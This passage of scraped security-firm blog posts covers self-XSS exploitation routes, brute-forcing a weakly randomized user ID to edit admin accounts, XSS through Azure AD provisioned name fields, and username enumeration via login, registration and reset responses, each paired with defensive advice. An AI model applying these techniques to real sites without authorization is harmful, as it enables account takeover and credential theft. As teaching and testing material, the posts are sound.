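def issue_csrf_token(session: Dict[str, str]) -> str:
    """Create the session's token once; embed it in every form as a hidden field."""
    token = session.get("csrf_token")
    if token is None:
        token = secrets.token_urlsafe(32)
        session["csrf_token"] = token
    return token


def handle_name_change(session: Dict[str, str], form: Dict[str, str]) -> bool:
    expected = session.get("csrf_token", "")
    submitted = form.get("csrf_token", "")
    # Reject when either token is missing or they differ (constant-time comparison)
    if not expected or not submitted or not hmac.compare_digest(
            expected.encode(), submitted.encode()):
        return False
    session["name"] = form.get("name", "")
    return True
```

Login and logout requests need similar protection, since the CSRF logout/login technique below abuses exactly those endpoints.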

CSRF Logout/Login

Another potential method for using CSRF to execute self-xss against another user is discussed by @brutelogic in his post here: https://brutelogic.com.br/blog/leveraging-self-xss/

Essentially, CSRF is used to log the current user out of their session and log them back in to the account we control that contains the self-xss. Our credential-stealing xss vector would work perfectly for this, since it would steal the user’s browser-stored credentials for us.

Pre-Compromised Accounts

While I’ve never seen or heard of this being successfully implemented, it is possible to target a particular email address and create an account on the affected site for it. The owner of the targeted email address will typically receive a welcome email letting them know an account has been created for them on the affected application. As the attacker, we insert the self-xss payload into the user’s account when the account is created. Since the user won’t know the password we’ve set for them, we could trigger the password reset for them, or simply wait for them to request a password reset themselves. Once they successfully log in to the account, our xss payload will execute.

XSS Jacking

XSS Jacking is an XSS attack by Dylan Ayrey that can steal sensitive information from the victim. XSS Jacking requires clickjacking, paste hijacking, and paste self-xss vulnerabilities to be present in the affected site, and it even needs some social engineering to function properly, so I’m not sure how likely this attack really is.

While this particular attack vector requires a specific series of somewhat unlikely events to occur, you can see a POC for xss jacking here: https://security.love/XSSJacking/index2.html

Pure Social Engineering

I added this one even though it doesn’t require the site to actually contain a self-xss vulnerability. This type of attack relies on people being dumb enough to open their web console and paste unknown JavaScript into it. While this seems rather unlikely, it is apparently more common than you’d think. This type of attack isn’t really a vulnerability in the site per se, but it could be used in conjunction with a lax (or missing) CSP to execute external JavaScript, or to steal the user’s session cookies if they are missing the HttpOnly flag, etc.

Posted by Facebook Security on Thursday, May 22, 2014

Conclusion

Hopefully we’ve been able to highlight some of the ways an attacker could exploit a seemingly innocuous self-xss vulnerability on your site. The key takeaways are:

- Even though you don’t *think* that a self-xss vulnerability on your site carries risk, it probably does, and you should fix it regardless.

- Make sure your site isn’t vulnerable to CSRF.

- You should implement a good Content Security Policy (CSP) to prevent external scripts from loading in your application
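For the CSRF takeaway, here is a minimal sketch of one common defense, the synchronizer token pattern: the server issues an unpredictable per-session token, embeds it in its forms, and rejects state-changing requests that don't send it back. The in-memory `sessions` map and both function names are hypothetical, and this is not the fix used by any application discussed here; a web framework's built-in CSRF protection would normally be preferred.

```javascript
const crypto = require("node:crypto");

// Hypothetical in-memory session store keyed by session ID (an assumption for this sketch).
const sessions = new Map();

// Issue a fresh, unpredictable CSRF token and bind it to the user's session.
function issueCsrfToken(sessionId) {
  const token = crypto.randomBytes(32).toString("hex");
  sessions.set(sessionId, { csrfToken: token });
  return token;
}

// Reject any state-changing request whose submitted token doesn't match the session's token.
function isValidCsrfToken(sessionId, submittedToken) {
  const session = sessions.get(sessionId);
  if (!session || typeof submittedToken !== "string") return false;
  const expected = Buffer.from(session.csrfToken, "utf8");
  const actual = Buffer.from(submittedToken, "utf8");
  // timingSafeEqual throws when lengths differ, so compare lengths first.
  return expected.length === actual.length && crypto.timingSafeEqual(expected, actual);
}
```

A cross-site POST like the name-changing request described earlier would fail this check, because the attacker's page cannot read the victim's token.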

Web App assessments are probably one of the most popular penetration tests performed today. These are so popular that public bug bounty sites such as Hacker One and Bug Crowd offer hundreds of programs for companies wanting to fix vulnerabilities such as XSS, SQL Injection, CSRF, etc. Many companies also host their own bounty programs for reporting web vulnerabilities to a security team. Follow us in our 4-part mini series of blog posts about web security:

In a continuation of our portal protections series, we’re going to walk through an “obscured” vulnerability we discovered that gave us super admin privileges to the application we were testing.

From Wikipedia:

“security through obscurity (or security by obscurity) is the reliance on the secrecy of the design or implementation as the main method of providing security for a system or component of a system. A system or component relying on obscurity may have theoretical or actual security vulnerabilities, but its owners or designers believe that if the flaws are not known, that will be sufficient to prevent a successful attack.”

The application containing this vulnerability allows a company administrator to edit users in their company, but does not allow them to edit the site admin “superusers” or other companies’ users.



Our company admin user account can only see 10 accounts when accessing the “User Management -> User Profiles” page. All accounts outside of the company are hidden from the user.





When we want to edit a user, we can click on their entry in the users table above, and the application visits the page path “/Admin/UserEdit.aspx?ContactId=<someid>”. Here we show the user accessing the silentadmin user’s profile page using a contactId of 5J37580Km66K015. I wonder where this “contactId” is coming from. Is it really as randomly generated as it appears to be?



The ContactId for each user can be made visible by deleting the inline style “display:none” from the page’s HTML. The EncryptedId is the ContactId used to access the user’s profile page.

Three separate page loads of the user view were performed, and the resulting EncryptedId values were compared to see whether the encryption scheme could be identified. The IDs were 15 characters long: the first five and last five characters were the same for every user each time the page was loaded, but the middle 5 characters appeared to be tied specifically to the user’s account and never varied. This was exciting because it’s much easier to guess 5 characters than 15, but it still left the question of how the application was generating and using the other 10 characters in the EncryptedId field to identify each user.

On a hunch that the first and last 5 characters didn’t really matter, we tried accessing a user’s account with zeros as the first and last 5 characters of the contactId. The application dutifully loaded the user’s profile page, ready for editing!

We quickly created 1,000 test accounts to determine whether there was a pattern or sequence to the characters assigned to each “encryptedId” position. A quick analysis of the resulting encryptedId strings showed that only specific character sets were being used for each of the 5 important character positions (characters 6 through 10). The following character sets were identified in each position:

| Position | Observed characters |
|---|---|
| 6 | `l`, `3`, `5`, `4`, `7`, `6`, `8` |
| 7 | `K`, `M`, `L`, `1`, `0`, `3`, `2`, `5`, `4`, `6` |
| 8 | `I`, `H`, `K`, `J`, `M`, `L`, `1`, `0`, `3`, `2` |
| 9 | `m`, `l`, `3`, `2`, `5`, `4`, `7`, `6`, `9`, `8` |
| 10 | `m`, `l`, `o`, `n`, `p`, `5`, `7`, `6`, `9`, `8` |



Burp Intruder was given a specialized payload where each position contained the identified characters and a brute-force guessing attack was performed to see if any EncryptedId strings could be guessed for user accounts not normally visible to the requesting user. Nearly 100,000 character combinations were tested, and several site administrator accounts were identified as being accessible and editable.

After conducting our brute-force contactId guessing attack, 20 previously “inaccessible” accounts were identified as being editable by our company administrator

The site’s ASP Administrator account was editable by our test account using the discovered contactId character sequence. This meant that we could change its email address and then submit a password reset request that would be sent to us, giving us full login access to the account.

This is a classic example of “security through obscurity” that did not prevent the vulnerability from being discovered and exploited. A 15-character ID made of truly random characters drawn only from lowercase a-z and 0-9 would have 36^15 (roughly 2.2 × 10^23) possible values, but our digging revealed that the limited randomization of the 5 significant characters allowed only about 70,000 combinations (7 × 10 × 10 × 10 × 10, based on the character sets above), which could be brute-forced in just a few hours. This also serves as a good example of why you should never write your own encryption algorithms.
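The keyspace comparison can be checked with a few lines of Node.js. This sketch multiplies the sizes of the character sets observed for positions 6 through 10 (copied from the sets listed above), and computes the keyspace of a truly random 15-character ID over a 36-character alphabet (lowercase a-z plus 0-9) using `BigInt`, since that value is far larger than `Number.MAX_SAFE_INTEGER`. The function names are illustrative.

```javascript
// Characters observed in positions 6 through 10 of the EncryptedId.
const observedSets = {
  6: ["l", "3", "5", "4", "7", "6", "8"],
  7: ["K", "M", "L", "1", "0", "3", "2", "5", "4", "6"],
  8: ["I", "H", "K", "J", "M", "L", "1", "0", "3", "2"],
  9: ["m", "l", "3", "2", "5", "4", "7", "6", "9", "8"],
  10: ["m", "l", "o", "n", "p", "5", "7", "6", "9", "8"],
};

// Keyspace of the significant characters: the product of the set sizes.
function significantKeyspace(sets) {
  return Object.values(sets).reduce((product, chars) => product * chars.length, 1);
}

// Keyspace of a truly random ID: alphabetSize ** length, as a BigInt to avoid overflow.
function randomKeyspace(alphabetSize, length) {
  return BigInt(alphabetSize) ** BigInt(length);
}

console.log(significantKeyspace(observedSets)); // 70000
console.log(randomKeyspace(36, 15).toString()); // 221073919720733357899776
```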



[post_title] => Insecurity Through Obscurity [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => insecurity-through-obscurity [to_ping] => [pinged] => [post_modified] => 2021-04-27 14:35:04 [post_modified_gmt] => 2021-04-27 14:35:04 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=25098 [menu_order] => 614 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [4] => WP_Post Object ( [ID] => 25109 [post_author] => 94 [post_date] => 2017-08-17 11:23:00 [post_date_gmt] => 2017-08-17 11:23:00 [post_content] =>We recently tested a web application that had implemented Azure Active Directory automatic provisioning through System for Cross-domain Identity Management (SCIM). Azure Active Directory can automatically provision users and groups to any application or identity store that is fronted by a Web service with the interface defined in the SCIM 2.0 protocol specification. Azure Active Directory can send requests to create, modify and delete assigned users and groups to this Web service, which can then translate those requests into operations upon the target identity store.

An interesting capability, but the real question is: “Can we exploit the application in some way if we already have access to the Azure panel?”



The first thing to test is the limits on the various fields. Let’s test the user’s display name, first name, and last name:

Well well well, looks like we can add basically any character we want into these fields. The maximum length of the first and last names is 64 characters each, and the display name allows 256 characters.

64 characters is enough to load a JavaScript file from elsewhere, so that’s one of the things we’ll try. Here’s our new malicious user:



Once we’ve synced our new user with the target application, let’s take a look back at our vulnerable application’s source to view the results:

Our user’s first and last names are inserted into the page source without HTML encoding, which results in two separate XSS injection points. One pops an alert, while the other imports an entire .js file from a shortened URL that displays a modal login prompt used to steal user credentials.

It just goes to show that you shouldn’t trust Microsoft to do filtering for you.

For all web applications, we recommend performing input filtering AND output encoding to ensure client-side security. In this case, Azure was not performing input filtering for the application, and the input was blindly trusted when generating the page content. At its core, XSS is dangerous because malicious HTML or JavaScript is placed in the page content without proper encoding. Despite this, we see many instances where input filtering is the only protection implemented by the application. Output encoding and input filtering complement each other as defense-in-depth controls that improve application security.
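Output encoding can be as simple as replacing the characters that are special in HTML before untrusted data, such as a SCIM-provisioned first or last name, is written into the page. This sketch assumes the values land in HTML text or a quoted attribute; JavaScript, URL, and CSS contexts need different encoders, and a templating engine with automatic escaping is usually the better choice. The `renderUserName` helper and its field names are hypothetical, not the tested application's code.

```javascript
// Characters that are significant in HTML text and quoted attribute values.
const HTML_ESCAPES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#39;",
};

// Encode untrusted data before inserting it into HTML.
function encodeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hypothetical profile fragment built from provisioned name fields.
function renderUserName(user) {
  return `<span class="name">${encodeHtml(user.firstName)} ${encodeHtml(user.lastName)}</span>`;
}

console.log(renderUserName({ firstName: "<script>alert(1)</script>", lastName: "Smith" }));
// <span class="name">&lt;script&gt;alert(1)&lt;/script&gt; Smith</span>
```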

This was a quick blog post, but we recommend considering any other areas where “trusted” data is used, such as SCIM.

If you want more information on how the SCIM technology functions, or want to test this out yourself, Microsoft provides some excellent documentation:

https://docs.microsoft.com/en-us/azure/active-directory/active-directory-scim-provisioning

[post_title] => XSS Using Active Directory Automatic Provisioning [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => xss-using-active-directory-automatic-provisioning [to_ping] => [pinged] => [post_modified] => 2021-04-27 14:38:07 [post_modified_gmt] => 2021-04-27 14:38:07 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=25109 [menu_order] => 622 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [5] => WP_Post Object ( [ID] => 25113 [post_author] => 94 [post_date] => 2017-01-30 11:27:00 [post_date_gmt] => 2017-01-30 11:27:00 [post_content] =>Web App assessments are probably one of the most popular penetration tests performed today. These are so popular that public bug bounty sites such as Hacker One and Bug Crowd offer hundreds of programs for companies wanting to fix vulnerabilities such as XSS, SQL Injection, CSRF, etc. Many companies also host their own bounty programs for reporting web vulnerabilities to a security team. Follow us in our 4-part mini series of blog posts about web security:

In a continuation of our portal protections series, we’ll be discussing some of the methods that attackers can use to discover valid usernames on your applications. If you don’t think that the ability to discover valid usernames is a security concern, please read the article linked above (Login Portal Security 101). Almost every web application has the following three pages or functions, so we’ll be discussing how each of them can be used to discover valid usernames:

- Login Submissions

- Account Registration

- Password Reset/Password Retrieval

Login Submissions

Attackers who use this method need to be careful, because excessively attacking primary login portals usually causes account lockouts and can also trigger automated security protections like IP blacklisting. The upside for an attacker performing username discovery through login submissions is that sometimes they get lucky and guess the user’s password on the first try. When using this method, the simplest attempt of “password” has logged us in on more occasions than I’d care to admit. Surprisingly, it has even worked on applications that (currently) enforce strong password policies, because the affected user created their password before strong passwords were enforced and hasn’t logged in since.

Blatantly Obvious Server Responses

Some of the applications we test suffer from the malady of being helpful to their users rather than secure. In this example, the server lets the user know whether their username or their password was incorrect so that it’s easier for them to fix. This gives the attacker a very easy way to discover valid usernames, because the server tells them when the username is correct.

Account Lockout Server Responses

Some login portals take a little more work to obtain a valid username. If the application has implemented an account lockout security mechanism, an attacker can submit the same username multiple times and eventually receive a message stating that the user’s account has been locked.

This method of username enumeration is probably the second least preferred method (just behind the password reset method) for white-hat pentesters because it locks out all of the discovered accounts. If the application has implemented a temporary account lockout duration, this can practically be used in the middle of the night, say 2am, because (in theory) the accounts should unlock automatically before users wake up.

The number of failed submissions prior to lockout varies from application to application, but is usually between 3 and 5. If an attacker submits a username like “thisusernamedoesnotexist12345” five times and gets the same “Your login information was invalid” server response message on the fifth attempt, but submitting a username like “jsmith” five times eventually results in a server response message that says “Your account has been locked, please check back in 20 minutes”, the attacker once again can confirm the validity of the username based upon the server response variations.

The first 4 login attempts with the username “itweb112” results in a server response that says “Your login information was invalid”

The fifth login attempt with the username “itweb112” results in a server response that says “Your account has been locked. Please check back in 20 minutes.”

Server Response Times

This method of username discovery is fairly tricky to perform and isn’t always an exact science, but we’ve tested several applications that are vulnerable to it. Basically, we analyze the time that it takes the server to respond to each login (or authentication) request. For a server vulnerable to this type of username discovery, the server response times will be split into two (or even three) very distinct lengths.

The screenshot below shows Burp Intruder being used to test an application that uses basic authentication to protect the requested page. The requested username is in the column labeled “comment”; it is base64 encoded together with the password “password” and submitted as the payload in each request. The server’s response content was always the same (“length” column), but the time it took the server to respond to each request varied significantly (“Response completed” column). All of the usernames that resulted in a server response of more than 1070 milliseconds were invalid, while all of the usernames that resulted in a server response of less than 600 milliseconds were identified as valid. Most of the valid usernames resulted in response times of less than 100 milliseconds, but a small number of accounts took between 300 and 600 milliseconds to respond. These were later identified as administrative accounts with elevated privileges on the site, a great bonus for any website enumeration.
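For readers unfamiliar with basic authentication: the `Authorization` header in each of those requests carries the username and password joined by a colon and base64 encoded (the “Basic” scheme defined in RFC 7617). A minimal sketch of building that value, using the example username `jsmith` from earlier in this post:

```javascript
// Build an HTTP Basic Authorization header value: "Basic " + base64("username:password").
function basicAuthHeader(username, password) {
  return "Basic " + Buffer.from(`${username}:${password}`, "utf8").toString("base64");
}

console.log(basicAuthHeader("jsmith", "password")); // Basic anNtaXRoOnBhc3N3b3Jk
```

Because only the username part changes between requests, any difference in response time can be attributed to how the server handles that username.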

Best Practices

These response time variations are usually caused by server-side logic that is performed when a valid username is submitted, but not performed when an invalid username is submitted (or vice versa).

Think about database queries that you perform for some usernames but not for others, and make sure that the time it takes to perform these extra functions isn’t revealing usernames to attackers. While this might sound like heresy to some of you speed/efficiency gurus out there, you can also add random variation to your response times by making the code sleep for a randomized amount of time before responding to requests that check the validity of usernames.
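A minimal Node.js sketch of both suggestions, under stated assumptions: the hypothetical `users` map stands in for the user database, scrypt from Node's built-in `crypto` module stands in for whatever password hash the application uses, and the 0-199 ms jitter range is arbitrary. The main idea is that an unknown username still pays for one full hash computation against a dummy record, so valid and invalid usernames do the same expensive work and receive the same message; the random delay is only an extra layer on top.

```javascript
const crypto = require("node:crypto");

// Hash a password with scrypt; the salt is stored alongside the hash.
function hashPassword(password, salt = crypto.randomBytes(16)) {
  return { salt, hash: crypto.scryptSync(password, salt, 64) };
}

// Hypothetical user store: username -> { salt, hash }.
const users = new Map([["jsmith", hashPassword("correct horse battery staple")]]);

// Dummy record hashed once at startup, used when the username does not exist,
// so every login attempt performs exactly one scrypt computation.
const DUMMY = hashPassword(crypto.randomBytes(16).toString("hex"));

function checkLogin(username, password) {
  const record = users.get(username) ?? DUMMY;
  const candidate = crypto.scryptSync(password, record.salt, 64);
  const matches = crypto.timingSafeEqual(candidate, record.hash);
  // Only a real record can succeed; the message never says which part was wrong.
  const ok = matches && record !== DUMMY;
  return { ok, message: ok ? "Login successful" : "Either your username or password was incorrect" };
}

// Resolve the result after a random delay (0-199 ms by default, an arbitrary range).
function checkLoginWithJitter(username, password, maxDelayMs = 200) {
  const result = checkLogin(username, password);
  return new Promise((resolve) => setTimeout(() => resolve(result), crypto.randomInt(0, maxDelayMs)));
}
```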

Account Registration

For applications that use open enrollment, and even some that use closed enrollment, the registration form can be used to discover valid usernames and/or registered email addresses.

Pre-Validation

In some cases, as soon as a user enters their desired username, a request will be sent that validates it isn’t already taken before a user proceeds to sign their life away. Repeat that request pattern and we have our discovery point, easy enough. This configuration makes it simple for an attacker, but is pretty common in web applications today. Here is a real world example:

The first step in the registration process asks the user to choose a username for their new account. If the username is being used by an existing account, the application will helpfully tell the user that they need to choose a different one.

The request for a username that isn’t already in use returns

Burp Intruder being used to automate the submission of different usernames to discover which ones are currently in use on the application

Single Step

In other cases, the entire registration request may need to be submitted before the site will indicate that a username is already in use. This is a problem for testing, as we don’t want to create tons of accounts when the username isn’t already taken. To get around this, we can take advantage of the fact that most registration forms implement some type of validation on the form elements to prevent someone from registering without a syntactically valid email address, first or last name, phone number, etc. These validation controls are usually implemented both on the client side in JavaScript and on the server side in the back-end code. Client-side validation can be trivially bypassed through manual request modification; the trick is then to identify the validation being performed on the server side and submit requests that will be rejected before an account is actually registered, but that still reveal whether a requested username or email address is already registered in the application. For example, let’s say a web application needs a username and email address to register, and for a valid request, the email address must contain an ‘@’ sign. Here is how we might brute-force safely without accidentally creating accounts:

Valid Request

username=david&email=dvahn@email.com [Account Created]

Brute Force

username=david&email=bad [Username Taken = No account creation]

username=james&email=bad [Username is valid, but E-Mail is invalid = No account creation]

This can get complicated when you consider that parameter validation can occur in different orders on the server side, but it should work in most cases. This would also be a great time to verify that client-side validation isn’t the only thing preventing an attacker from abusing the form.
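To make the ordering dependency concrete, here is a toy server-side handler, entirely hypothetical, that checks username availability before validating the email, the same ordering as the david/james example above. Sending a deliberately invalid email means no account is ever created, yet the response still reveals whether each username exists.

```javascript
// Hypothetical registration state.
const existingUsernames = new Set(["david"]);
const createdAccounts = [];

// Checks username availability BEFORE validating the email address.
function register({ username, email }) {
  if (existingUsernames.has(username)) {
    return "Username taken";
  }
  if (!email.includes("@")) {
    return "E-Mail is invalid"; // reached only when the username is free
  }
  existingUsernames.add(username);
  createdAccounts.push(username);
  return "Account created";
}

// Probe each candidate with an invalid email so the request always fails validation.
function probeUsernames(candidates) {
  return candidates.map((username) => ({
    username,
    taken: register({ username, email: "bad" }) === "Username taken",
  }));
}

console.log(probeUsernames(["david", "james"]));
console.log(createdAccounts.length); // 0
```

Validating every field before checking availability removes this side-effect-free probe, although a fully valid request can still reveal a taken username, which is where the CAPTCHA recommendation below comes in.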

Best Practices

CAPTCHAs should be required on the registration request that checks for existing username conflicts. CAPTCHAs help prevent an attacker from automating the username discovery process, but you need to watch out for a few common issues when implementing them. We discuss some common CAPTCHA issues in our post: Captchas Done Right?

Password Reset/Password Retrieval

Okay, this one is almost always the least preferred method of username discovery because usually the site will send out a password reset email to the user’s email address on file. This notifies the user that someone other than themselves has discovered their username/email and is attempting to reset their password. This can put the user on high-alert and they may potentially notify the application’s security team that someone has attempted a password reset on their account.

However, not all applications send out an email to the user when they request a password reset. Some sites will have the user answer their security questions and allow them to reset their password as soon as their security questions are answered correctly. These types of applications are good to use for username discovery because the user is never notified, and sometimes you can guess the answers to their security questions more easily than you can guess their password.

Here’s an example of an application that uses the user’s security question to reset their password instead of sending out an account reset email to the user. Notice that the application immediately notifies the user when they enter a username that’s not in use:

When they enter an existing username, the application proceeds to a second page that prompts the user to verify their identity:

Best Practices

Once again, CAPTCHAs should be required on password reset requests. CAPTCHAs help prevent an attacker from automating the username discovery process, but you need to watch out for a few common issues when implementing them. We discuss some common CAPTCHA issues in our post: Captchas Done Right?

Okay, where do the usernames come from?

Each of these attack vectors requires a predefined list of usernames to test with, so now you’re wondering where to get them. You can obtain lists of usernames by either:

- Performing Open-source intelligence (OSINT) or

- Generating them

OSINT username gathering usually requires more work on the part of the attacker, but there are actually many automated methods of doing this research as well. Here are a couple of scripts you can use to gather up emails and possible usernames for a specific company:

- Lee Baird’s Discover script: https://github.com/leebaird/discover

- A LinkedIn scraper I wrote and host here: https://github.com/wpentester/Linkedin_profiles

Brute-force guessing of usernames takes a while, makes lots of noise in logs, and is generally less sophisticated than gathering valid usernames through OSINT; however, brute-forcing is sometimes the only option and can often yield more results than targeted username discovery. PortSwigger’s Burp Suite Free Edition has a pretty awesome extension called CO2 that can generate potential username lists for you using census data.

Adding the CO2 extension in Burp

Using the CO2 extension in Burp to generate username lists

Conclusion

All of these methods of discovering usernames are performed in an unauthenticated context on an application. There are also various ways to perform username discovery once you are authenticated into the application, but it is usually less risky to perform username discovery outside of an authenticated session. If you’re still questioning whether username discovery is a security concern, please read our original post on portal protections.


[post_title] => Username Discovery [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => username-discovery [to_ping] => [pinged] => [post_modified] => 2021-04-27 14:41:30 [post_modified_gmt] => 2021-04-27 14:41:30 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=25113 [menu_order] => 647 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [6] => WP_Post Object ( [ID] => 25126 [post_author] => 94 [post_date] => 2017-01-23 11:37:00 [post_date_gmt] => 2017-01-23 11:37:00 [post_content] =>Web App assessments are probably one of the most popular penetration tests performed today. These are so popular that public bug bounty sites such as Hacker One and Bug Crowd offer hundreds of programs for companies wanting to fix vulnerabilities such as XSS, SQL Injection, CSRF, etc. Many companies also host their own bounty programs for reporting web vulnerabilities to a security team. Follow us in our 4-part mini series of blog posts about web security:

To begin, let’s start with some abstract thinking. When we think about attempts to discover web vulnerabilities, we like to think about attack surface. If you are looking for needles in haystacks, it helps if you have access to all of the hay first. This brings us to a common functionality that puts lots of needles in off-limit haystacks:

Authentication

While vulnerabilities can be classified many different ways, for the purposes of this post let’s use the following two:

Unauthenticated – The vulnerability can be actively exploited without first needing to log in or authenticate to the affected application. In other words, “public” areas of the website/service.

Authenticated – An authenticated state is required for exploitation of the vulnerability. This could come in the form of a username:password, logon token, session cookie, etc.

Normally, through the nature of “more functionality = more flaws”, most vulnerabilities in web applications are authenticated. Some vulnerabilities fall into one of these categories by definition, such as cross-site request forgery (CSRF) or authentication bypass; but even these vulnerabilities are usually only found in an authenticated context in the first place. Unfortunately, when we think about authentication, we commonly associate it with trust. A “hacker” isn’t one of your customers. They don’t log in, or use profile pictures, or file uploads, or that hidden query form you built for a good friend. They don’t have a username/password, and you wouldn’t give them one anyway; all they do is break stuff. So if most of my vulnerabilities can only be found/exploited by an authenticated user, how can an attacker gain authorized access to my application? That depends on whether the application has open registration or closed registration.

Registration

Open registration means that anyone can sign up for a free account (yay, we’re in!) and closed registration means that a user must either be registered by someone else or register using a predefined set of information in order to gain authorized access.

Open Registration

If your application uses an open registration model, an attacker can create a free account and start testing in an authenticated context immediately. We recently tested an application that had a host of high-risk vulnerabilities (including SQL injection) that couldn’t be identified by an unauthenticated user but were exploitable by a user with a free trial account.

Open registration applications should implement an authorization scheme by assigning registered users a low-privileged user “role” that has limited access to the site’s content. User roles are great, but you have to ensure that everything in your application abides by the security controls enforced in the user’s role. Do NOT try to protect content, functionality, or anything else on the application using what is commonly known as “security through obscurity”, because it usually doesn’t work. We’ll be posting an article or two soon that show how we’ve been able to see through the developer’s attempts at obscuring some pretty serious vulnerabilities.

If you have user roles within your application, this means that you probably have an administrative role that has access to much more of the site’s content than a normal user. Attackers will try to determine which content they cannot access, and then try to figure out if the content is protected by access controls, or whether they are being protected simply by hiding it from the normal user’s default views. ALWAYS protect sensitive content through access controls instead of by hiding the content from the low-privileged user.
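As a sketch of enforcing this on the server rather than relying on hidden or hard-to-guess identifiers, the function below decides whether a requester may edit a target account based only on role and company, no matter how the target's ID was obtained. The roles (`superuser`, `companyAdmin`, `user`), the `companyId` field, and the `accounts` map are hypothetical.

```javascript
// Hypothetical account records.
const accounts = new Map([
  ["u1", { id: "u1", companyId: "acme", role: "companyAdmin" }],
  ["u2", { id: "u2", companyId: "acme", role: "user" }],
  ["u3", { id: "u3", companyId: "initech", role: "user" }],
  ["u4", { id: "u4", companyId: "platform", role: "superuser" }],
]);

// Server-side authorization check, applied to every edit request whether the target ID
// was visible in the UI, hidden with display:none, or guessed.
function canEditUser(requester, targetId) {
  const target = accounts.get(targetId);
  if (!target) return false;
  if (requester.role === "superuser") return true;
  // Regular users may edit only their own account.
  if (requester.role !== "companyAdmin") return requester.id === target.id;
  // Company admins may edit only non-superuser accounts in their own company.
  return target.companyId === requester.companyId && target.role !== "superuser";
}
```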



(PayPal.com is an example of an application that uses open registration: “sign up for free”)

Closed Registration

Sweet, my site has closed registration, so that means users have to verify their identity and be pre-registered in our system in order to create an account. This should prevent a lot of attackers from exploiting the vulnerabilities locked behind my login portal…right? Answer: Maybe. If the vast majority of your functionality, and associated vulnerabilities, are only found or exploitable in an authenticated context, then an attacker is going to try to gain authenticated access by the easiest means available. An attacker’s first order of business will be to test your anti-automation protections on the registration, password reset, and login pages. (You have those, right?) This is used to determine whether a credential brute-force attack is possible. An attacker will take the path of least resistance when attacking an application, and guessing an existing user’s username and password is frequently much easier than guessing the specific information needed to register a new user’s account, phishing for credentials, or paying for a legitimate account. If an attacker is able to guess an existing user’s account credentials, they not only get access to that user’s data but also gain anonymity by using the compromised user account to discover and exploit additional vulnerabilities within the application.



(bankofamerica.com is an example of an application using closed registration. It requires an applicant to obtain a Bank of America card or account prior to registration)

So an attacker is going to attempt to enumerate usernames, passwords, and other related information from my website. There are many common protections web developers implement against these attacks, some better than others. Let’s go through them and discuss their effectiveness.

Common Portal Protections

- CAPTCHAs

- Account Lockout

- IP blacklisting

- IP rate-limiting

- Username rate-limiting

- Session Control and CSRF embedded tokens

- Ambiguous server responses

- Strong Password Policy

- Dual-Factor Authentication

At the top of each protection section, we’ve provided a simple chart to show whether the type of protection is likely to prevent certain types of attackers from conducting either username discovery, or brute-force login attacks. Here’s the Legend:

The protection will most likely prevent a successful attack from the specified source.

The protection will most likely NOT prevent a successful attack from the specified source.

The protection will most likely prevent a successful attack from the specified source, but there are exceptions/bypasses that could make this attack exploitable.

The protection will most likely NOT prevent a successful attack from the specified source and can potentially be used to perform additional attacks against the users or support personnel of the application.

CAPTCHAs

| Vulnerability | Scanners | Script Kiddies | Amateurs | Hacktivists | Professionals |
|---|---|---|---|---|---|
| Username Discovery |  |  |  |  |  |
| Brute-Force Login |  |  |  |  |  |

The chart may make it appear that CAPTCHAs are the silver bullet of portal protection, but everything depends on whether the application has implemented CAPTCHAs correctly. The results in the chart also only apply when ALL aspects of your portal are protected by CAPTCHAs. I wrote more about proper CAPTCHA implementation in this blog post.

If CAPTCHAs are implemented correctly, an attacker will likely move on to another site with fewer protections.
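The requirement that ALL parts of the portal be covered can be pictured as a single gate that every automatable endpoint must pass through. This is a minimal sketch under stated assumptions, not the approach from the CAPTCHA post mentioned above. The endpoint paths, `CaptchaGate`, and the `verify_token` callback are all hypothetical. In a real deployment, `verify_token` would be a server-side call to your CAPTCHA provider. The gate also refuses reused tokens, because a solved CAPTCHA that can be replayed does nothing to stop automation.

```python
from typing import Callable, Optional, Set

# Hypothetical list: every page an attacker could automate must appear here.
PROTECTED_ENDPOINTS = {"/login", "/register", "/password-reset"}

class CaptchaGate:
    """Require a fresh, server-verified CAPTCHA token on every protected endpoint."""

    def __init__(self, verify_token: Callable[[str], bool]):
        # Assumed callback that asks the CAPTCHA provider, server-side,
        # whether this token was genuinely solved.
        self.verify_token = verify_token
        # Tokens already accepted once (a real system would expire these).
        self.used_tokens: Set[str] = set()

    def allow(self, endpoint: str, token: Optional[str]) -> bool:
        if endpoint not in PROTECTED_ENDPOINTS:
            return True
        if not token or token in self.used_tokens:
            return False  # missing or replayed token
        if not self.verify_token(token):
            return False  # provider says the challenge was not solved
        self.used_tokens.add(token)  # one solved CAPTCHA buys one request
        return True
```

Coverage depends entirely on the endpoint list. Leave out one page, such as a password-reset form, and the brute-force path is open again.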

Account Lockout

| Vulnerability | Scanners | Script Kiddies | Amateurs | Hacktivists | Professionals |
|---|---|---|---|---|---|
| Username Discovery |  |  |  |  |  |
| Brute-Force Login |  |  |  |  |  |

Account lockout is a very popular choice in many of the applications we test, but there are a couple of issues you need to watch out for when implementing it:

Username Enumeration using account lockout response messages

If the server responds with a message indicating that the account has been locked, an attacker can use this to determine valid usernames. One way to implement account lockout is to never display a lockout message to the user. Instead, send an email to the user’s address on file notifying them that their account has been locked due to excessive login attempts. The server should still display only the message “Either your username or password was incorrect” when an account has been locked, so that the attacker cannot tell whether they have guessed a correct username. The gotcha in this scenario is that you must rate-limit the lockout emails. Otherwise you might send several thousand of them to your poor user if the attacker is trying several thousand passwords and doesn’t care (or doesn’t check) that the account has been locked. Also be mindful of response times: if your application reveals that extra actions are being performed for a specific request, this could tip an attacker off. More info about this in a later blog post.

In our opinion, the best protection is to lock out any username that is submitted for login more than 5 times, even if the username is not registered in the system. Some of the best applications we test have implemented this protection, and it makes it nearly impossible to determine whether a username is valid.
